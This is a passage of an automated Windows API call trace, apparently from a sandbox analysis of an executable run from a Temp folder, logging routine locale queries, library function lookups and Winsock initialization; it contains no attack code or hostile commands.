lpLCData="December") returned 9 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0098.010] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarCmp") returned 0x76c2b0dc [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0098.011] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0098.011] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0098.011] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0098.011] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0098.011] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0098.011] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0098.011] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15480003909) returned 1 [0098.011] GetTickCount () returned 0x2367a [0098.011] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x1d5)) [0098.011] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x1d5)) [0098.011] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=15480017501) returned 1 [0098.011] GetTickCount () returned 0x2367a [0098.011] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x1d5)) [0098.011] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x1d5)) [0098.011] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0098.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0098.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x15082bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0098.011] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0098.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x14f288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0098.011] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0098.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x15082bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0098.011] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0098.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0098.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x15082bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0098.011] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0098.011] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x15082bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0098.012] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x15082bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0098.012] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0098.012] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x150f48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0098.012] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x15082bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0098.012] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x150f48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0098.012] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0098.012] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x150f48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0098.012] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0098.012] GetThreadLocale () returned 0x409 [0098.012] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0098.012] GetCurrentThreadId () returned 0xbc0 [0098.012] GetCurrentThreadId () returned 0xbc0 [0098.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0098.012] GetThreadLocale () returned 0x409 [0098.012] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0098.012] GetThreadLocale () returned 0x409 [0098.012] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0098.012] GetCurrentThreadId () returned 0xbc0 [0098.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0098.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0098.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0098.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0098.012] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0098.013] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0098.014] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0098.015] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0098.015] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0098.015] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0098.015] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0098.015] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0098.015] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0098.015] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0098.015] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0098.015] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0098.016] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0098.017] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0098.017] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0098.017] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0098.017] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0098.017] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0098.017] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0098.017] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0098.017] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0098.017] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0098.017] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0098.022] GetACP () returned 0x4e4 [0098.022] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0098.022] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0x30 [0098.022] GetTickCount () returned 0x2367a [0098.022] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=15481087383) returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x79\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6c\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x37\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x44\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x56\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x50\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0098.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: 